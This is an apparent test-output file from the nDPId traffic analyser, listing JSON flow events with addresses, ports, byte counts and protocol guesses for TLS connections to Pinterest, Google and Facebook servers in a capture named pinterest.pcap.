+00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
+00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
+00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 